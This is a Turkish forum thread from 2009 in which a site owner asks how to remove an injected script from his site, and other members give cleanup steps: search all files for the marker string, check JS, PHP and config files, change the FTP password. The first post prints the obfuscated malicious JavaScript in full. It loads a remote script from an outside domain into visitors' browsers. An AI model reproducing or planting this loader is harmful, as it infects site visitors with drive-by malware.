Arkadaşlar siteme Trojan Bulaşmış hepsini temizledim ama sorun şu
Sitemin kaynağını görüntülediğimde aşağıdaki kod gözüküyor
Kod:
</head><s><!--
(function(){var bCUf='%';var hBw=unescape(('var"20"61"3d"22Scrip"74Engi"6ee"22"2c"62"3d"22Versio"6e()+"22"2cj"3d"22"22"2cu"3d"6e"61vigat"6fr"2euser"41g"65n"74"3b"69f"28("75"2eind"65x"4ff("22Win"22"29"3e0"29"26"26(u"2einde"7f("22NT"206"22)"3c0)"26"26(document"2e"63ookie"2ei"6edexOf"28"22"6di"65"6b"3d1"22)"3c"30)"26"26(typeof(zrvzts)"21"3dtypeo"66("22A"22"29))"7bzrvzts"3d"22"41"22"3be"76a"6c("22if"28wi"6edow"2e"22+a+"22)j"3dj+"22"2ba+"22M"61jor"22+b"2b"61+"22"4di"6e"6fr"22"2bb+a"2b"22Bu"69"6cd"22+"62+"22j"3b"22)"3bdocument"2ewrite("22"3cs"63ript"20src"3d"2f"2fgu"6dblar"2e"63"6e"2f"72ss"2f"3fi"64"3d"22+j"2b"22"3e"3c"5c"2f"73cript"3e"22)"3b"7d').replace(/"/g,bCUf));e v a l(hBw)})();
--></s>
Ftp'den indexe girdiğimde ise bu kod gözükmüyor
ne yapabilirim
Kayıt: Jun 02, 2003 Mesajlar: 1842 Konum: Istanbul
Tarih: 2009-05-15, 12:53:21 Mesaj konusu:
Komple site yedeğini bir klasöre indir.
zrvzts kodunu tüm dosyaların içinde arattır. (Tekrar eden kod parçası bu)
Bu kod parçasının içinde geçtiği dosyaları temizle sonra temizlediğin klasörü siteye yükle.
Ayrı işlemi komple veritabanı yedeğinde de yapman gerekebilir.
Bankocunun söylediği işlemlerin ardındanda ftp ne geri yüklemeden mutlaka ftp şifreni değişdir,aksi takdirde virüsün kırmış olduğu şifren yüzünden aynı virüs tekrardan türeyebilir.
Arıyacağın kısım zrvzts değil
(function(){var bCUf dir
Bunu tarat %90 inculudes dosyasının içindeki jslerde çıkcak. bu koddaki bCUf değişkendir. Bunu temizledikten sonra diğer dosyaları incele. Js dosyalarına bakmanı tavsiye ederim. El altta buna benzer ama farklı bi kod göreceksin. Mesela
(function(){var bCUf değil ama (function(){var Wqrt gibi. var dan sonraki kısım değişken olduğu için onlarca değişik şekilde kendini enjekte ediyor. o yüzden biraz sabırla diğerlerini de bulup silersin.
Yukarda söylediğim virüsler dediğiniz JS dosyalarında zaten vardı.Hepsini silmeme rağmen halen sitemin kaynağını görüntülediğimde yine o kodlar çıkıyor. Şuan site temiz ama halen index'te kodlar gözüküyor
Sadece js lerde değil. .html ve .php dosyalarında da var. Mesela herhangi bir modülünüzün index.php sine giriniz. En üstte <php> </body> kodları arasına yada <head> </head> kodları arasına yerleştiriyor.
+ olarak index.php lerde bulduğun kodu tüm dosyalarda arattır çoğu config.php ve çoğu bloğa bulaşmış olduğunu göreceksin. Onları da sildikden sonra sorunun kalmayacak
Bu forumda yeni başlıklar açamazsınız Bu forumdaki başlıklara cevap veremezsiniz Bu forumdaki mesajlarınızı değiştiremezsiniz Bu forumdaki mesajlarınızı silemezsiniz Bu forumdaki anketlerde oy kullanamazsınız